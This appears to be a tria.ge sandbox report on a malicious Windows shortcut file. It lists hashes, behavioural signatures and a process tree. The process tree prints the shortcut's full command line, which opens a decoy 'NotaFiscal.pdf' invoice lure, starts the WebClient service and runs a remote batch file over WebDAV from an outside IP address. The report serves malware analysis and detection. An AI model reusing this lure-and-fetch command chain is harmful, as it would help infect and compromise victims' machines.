Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
09/05/2024, 08:32
Static task
static1
Behavioral task
behavioral1
Sample
f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk
Resource
win10v2004-20240508-en
General
-
Target
f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk
-
Size
2KB
-
MD5
7b5db2de0a2d91a0e6f83080e8dd0d6e
-
SHA1
5a370fa094efe972929d1e6dc604162821da698b
-
SHA256
f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747
-
SHA512
2f816236825717d5aa942898f8320e73883364d76a2fd36c935f9b21f7c034f5176ed2365ff9157e7ccc4e7bbf1b1e1af40c0811619fe481b28fcf0c07f9080c
Malware Config
Signatures
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1980 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2572 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2672 AcroRd32.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2672 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2672 AcroRd32.exe 2672 AcroRd32.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2380 wrote to memory of 2612 2380 cmd.exe 29 PID 2380 wrote to memory of 2612 2380 cmd.exe 29 PID 2380 wrote to memory of 2612 2380 cmd.exe 29 PID 2612 wrote to memory of 2672 2612 cmd.exe 30 PID 2612 wrote to memory of 2672 2612 cmd.exe 30 PID 2612 wrote to memory of 2672 2612 cmd.exe 30 PID 2612 wrote to memory of 2672 2612 cmd.exe 30 PID 2612 wrote to memory of 1980 2612 cmd.exe 31 PID 2612 wrote to memory of 1980 2612 cmd.exe 31 PID 2612 wrote to memory of 1980 2612 cmd.exe 31 PID 2612 wrote to memory of 2572 2612 cmd.exe 32 PID 2612 wrote to memory of 2572 2612 cmd.exe 32 PID 2612 wrote to memory of 2572 2612 cmd.exe 32 PID 2612 wrote to memory of 2348 2612 cmd.exe 34 PID 2612 wrote to memory of 2348 2612 cmd.exe 34 PID 2612 wrote to memory of 2348 2612 cmd.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/min /c "echo Visualizacao indisponivel > C:\Users\Admin\\downloads\\NotaFiscal.pdf && start C:\Users\Admin\\downloads\\NotaFiscal.pdf && start sc start webclient && ping localhost -n 7 && start /min cmd.exe /c \\38.180.136.158@80\iZFhhtoO\Offer202447.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\NotaFiscal.pdf"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2672
-
-
C:\Windows\system32\sc.exesc start webclient3⤵
- Launches sc.exe
PID:1980
-
-
C:\Windows\system32\PING.EXEping localhost -n 73⤵
- Runs ping.exe
PID:2572
-
-
C:\Windows\system32\cmd.execmd.exe /c \\38.180.136.158@80\iZFhhtoO\Offer202447.bat3⤵PID:2348
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f7990247e022bf5b7d09e633ff0f6e6d
SHA1d2511e80ca516481bda9a0bf13bd45b441c3e780
SHA256fd352a2335b720596c93bdf0a5fbe8f285e3bf46d5c8f227ccbfab80e6afa701
SHA512baa35aa38e742cbc3e74b9f8cd95c1f22a698590d5d598d6030c2dd1ebbad3e9cb2bc3082cfeb19ca632eee03818fcbbdd68531119c9ae1a9a6a4c3406ee21e9
-
Filesize
29B
MD5823a9caa296579d6a40cd5195d969727
SHA15592813787ecff9133229439498d624339c07ece
SHA25660b827294f341e5f200c6512b976cac056a592ac1abdd932af8abff314b7bb0e
SHA51277ec77b000d5d230071a101954968f585ceed9e589652af38411d14b594a7432b610ef9c8b7d1c9256a5e6fe5eeda53d017a4c6d840c987b884b9cca17d7e0bc